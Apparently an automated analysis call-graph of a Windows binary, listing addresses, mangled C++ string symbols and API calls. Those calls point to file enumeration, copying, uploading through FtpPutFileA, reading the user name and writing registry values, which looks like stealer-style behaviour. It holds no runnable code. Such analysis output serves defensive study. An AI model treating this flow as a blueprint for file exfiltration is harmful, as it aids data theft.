??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1404->1502 1406 672550 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1407 6725b7 1406->1407 1408 6725f3 6 API calls 1406->1408 1409 6725c0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1407->1409 1410 672683 1408->1410 1411 672a3f FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1408->1411 1409->1408 1409->1409 1413 672a20 FindNextFileA 1410->1413 1414 67269e 7 API calls 1410->1414 1417 67288e FindNextFileA 1410->1417 1420 67275d 10 API calls 1410->1420 1422 672a09 FindNextFileA 1410->1422 1430 6728da 10 API calls 1410->1430 1412 671260 4 API calls 1411->1412 1415 672a9e ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1412->1415 1413->1410 1416 672a3b 1413->1416 1414->1410 1414->1417 1505 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1415->1505 1416->1411 1417->1410 1417->1413 1419 672adc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1421 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1419->1421 1454 672b07 1419->1454 1503 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1420->1503 1424 674bfc 7 API calls 1421->1424 1422->1410 1422->1413 1427 673557 1424->1427 1425 672c93 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1431 672cc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1425->1431 1425->1454 1426 672b2f 6 API calls 1428 672bd4 6 API calls 1426->1428 1429 672ba1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1426->1429 1427->1316 1506 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1428->1506 1429->1428 1429->1429 1504 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1430->1504 1435 672d53 8 API calls 1431->1435 1436 672d1e 1431->1436 1434 67336d 1434->1421 1438 673375 memset 1434->1438 1440 672e01 fgetc 1435->1440 1439 672d20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1436->1439 1437 672c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1507 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1437->1507 1442 673396 1438->1442 1443 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1438->1443 1439->1435 1439->1439 1444 672e18 fputc 1440->1444 1440->1454 1446 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1442->1446 1511 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1443->1511 1444->1454 1445 672c59 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpPutFileA 1451 67333d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1445->1451 1446->1443 1446->1446 1448 672e3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1508 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1448->1508 1450 672faf fclose fclose 1450->1454 1455 672fd3 6 API calls 1450->1455 1451->1454 1452 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 1452->1421 1456 673432 8 API calls 1452->1456 1453 672e55 6 API calls 1457 672ef4 8 API calls 1453->1457 1458 672ec1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1453->1458 1454->1425 1454->1426 1454->1434 1454->1440 1454->1448 1454->1450 1454->1451 1459 673083 7 API calls 1455->1459 1460 673050 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1455->1460 1456->1421 1457->1454 1458->1457 1458->1458 1509 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1459->1509 1460->1459 1460->1460 1462 673121 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1463 6731a6 9 API calls 1462->1463 1464 673173 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1462->1464 1465 673283 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1463->1465 1466 673249 1463->1466 1464->1463 1464->1464 1510 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1465->1510 1468 673250 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1466->1468 1468->1465 1468->1468 1469 6732b7 7 API calls 1469->1454 1469->1455 1471 673993 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1470->1471 1472 673800 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1470->1472 1474 6712b0 3 API calls 1471->1474 1473 6712b0 3 API calls 1472->1473 1475 673867 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1473->1475 1476 6739f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI CreateDirectoryA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1474->1476 1477 6712b0 3 API calls 1475->1477 1478 6712b0 3 API calls 1476->1478 1479 6738b2 12 API calls 1477->1479 1480 673a2d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1478->1480 1481 673b4f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1479->1481 1482 6712b0 3 API calls 1480->1482 1484 671480 85 API calls 1481->1484 1483 673a78 12 API calls 1482->1483 1483->1481 1485 673b65 1484->1485 1486 674bfc 7 API calls 1485->1486 1487 673b86 1486->1487 1487->1312 1488->1357 1489->1362 1490->1365 1491->1395 1493 671c42 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1492->1493 1494 671b11 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1492->1494 1495 674bfc 7 API calls 1493->1495 1496 671b71 fgetc 1494->1496 1497 671ca2 9 API calls 1495->1497 1498 671b83 fputc 1496->1498 1499 671b8d 8 API calls 1496->1499 1497->1400 1498->1496 1500 671c1e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1499->1500 1501 671c0b ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI DeleteFileA 1499->1501 1500->1493 1501->1500 1502->1406 1503->1410 1504->1410 1505->1419 1506->1437 1507->1445 1508->1453 1509->1462 1510->1469 1511->1452 1877 6725b9 1878 6725c0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1877->1878 1878->1878 1879 6725f3 6 API calls 1878->1879 1880 672683 1879->1880 1881 672a3f FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1879->1881 1883 672a20 FindNextFileA 1880->1883 1884 67269e 7 API calls 1880->1884 1887 67288e FindNextFileA 1880->1887 1890 67275d 10 API calls 1880->1890 1892 672a09 FindNextFileA 1880->1892 1900 6728da 10 API calls 1880->1900 1882 671260 4 API calls 1881->1882 1885 672a9e ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1882->1885 1883->1880 1886 672a3b 1883->1886 1884->1880 1884->1887 1942 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1885->1942 1886->1881 1887->1880 1887->1883 1889 672adc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1891 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1889->1891 1904 672b07 1889->1904 1940 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1890->1940 1894 674bfc 7 API calls 1891->1894 1892->1880 1892->1883 1897 673557 1894->1897 1895 672c93 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1901 672cc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1895->1901 1895->1904 1896 672b2f 6 API calls 1898 672bd4 6 API calls 1896->1898 1899 672ba1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1896->1899 1943 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1898->1943 1899->1898 1899->1899 1941 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1900->1941 1906 672d53 8 API calls 1901->1906 1907 672d1e 1901->1907 1904->1895 1904->1896 1905 67336d 1904->1905 1911 672e01 fgetc 1904->1911 1919 672e3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1904->1919 1921 672faf fclose fclose 1904->1921 1922 67333d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1904->1922 1905->1891 1909 673375 memset 1905->1909 1906->1911 1910 672d20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1907->1910 1908 672c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1944 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1908->1944 1913 673396 1909->1913 1914 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1909->1914 1910->1906 1910->1910 1911->1904 1915 672e18 fputc 1911->1915 1917 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1913->1917 1948 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1914->1948 1915->1904 1916 672c59 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpPutFileA 1916->1922 1917->1914 1917->1917 1945 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1919->1945 1921->1904 1925 672fd3 6 API calls 1921->1925 1922->1904 1923 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 1923->1891 1926 673432 8 API calls 1923->1926 1924 672e55 6 API calls 1927 672ef4 8 API calls 1924->1927 1928 672ec1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1924->1928 1929 673083 7 API calls 1925->1929 1930 673050 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1925->1930 1926->1891 1927->1904 1928->1927 1928->1928 1946 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1929->1946 1930->1929 1930->1930 1932 673121 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1933 6731a6 9 API calls 1932->1933 1934 673173 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1932->1934 1935 673283 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1933->1935 1936 673249 1933->1936 1934->1933 1934->1934 1947 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1935->1947 1938 673250 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1936->1938 1938->1935 1938->1938 1939 6732b7 7 API calls 1939->1904 1939->1925 1940->1880 1941->1880 1942->1889 1943->1908 1944->1916 1945->1924 1946->1932 1947->1939 1948->1923 1951 672687 1952 672690 1951->1952 1953 672a20 FindNextFileA 1952->1953 1954 67269e 7 API calls 1952->1954 1956 67288e FindNextFileA 1952->1956 1959 67275d 10 API calls 1952->1959 1960 672a09 FindNextFileA 1952->1960 1964 6728da 10 API calls 1952->1964 1953->1952 1955 672a3b FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1953->1955 1954->1952 1954->1956 1958 671260 4 API calls 1955->1958 1956->1952 1956->1953 1961 672a9e ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1958->1961 2012 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1959->2012 1960->1952 1960->1953 2014 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1961->2014 2013 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1964->2013 1965 672adc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1967 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1965->1967 1996 672b07 1965->1996 1968 674bfc 7 API calls 1967->1968 1971 673557 1968->1971 1969 672c93 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1974 672cc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1969->1974 1969->1996 1970 672b2f 6 API calls 1972 672bd4 6 API calls 1970->1972 1973 672ba1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1970->1973 2015 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1972->2015 1973->1972 1973->1973 1977 672d53 8 API calls 1974->1977 1978 672d1e 1974->1978 1976 67336d 1976->1967 1980 673375 memset 1976->1980 1982 672e01 fgetc 1977->1982 1981 672d20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1978->1981 1979 672c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 2016 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1979->2016 1984 673396 1980->1984 1985 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1980->1985 1981->1977 1981->1981 1986 672e18 fputc 1982->1986 1982->1996 1988 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1984->1988 2020 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA 